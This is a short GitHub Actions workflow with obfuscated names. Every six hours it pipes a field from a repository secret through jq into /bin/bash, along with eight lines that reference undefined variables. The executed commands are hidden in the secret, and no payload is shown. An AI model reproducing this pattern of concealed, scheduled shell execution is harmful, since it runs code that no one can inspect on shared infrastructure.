name: qianlisong2b
on:
  workflow_dispatch:
  schedule:
    - cron: '6 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: qianlisong2b
        env:
          cseao10: ${{ secrets.cseao10 }}
        run: |
          echo $cseao10 | jq -r .uyuuc2280 | /bin/bash
          echo $jmucg3924 | jq -r .wmos1 | /bin/bash
          echo $i19977 | jq -r .uoux1 | /bin/bash
          echo $dbt95624 | jq -r .yydx60 | /bin/bash
          echo $prq361 | jq -r .zeon1 | /bin/bash
          echo $wor3 | jq -r .o19813 | /bin/bash
          echo $mni47 | jq -r .m11 | /bin/bash
          echo $ey32 | jq -r .xpggk12283 | /bin/bash
          echo $v34 | jq -r .ajhpf6598 | /bin/bash

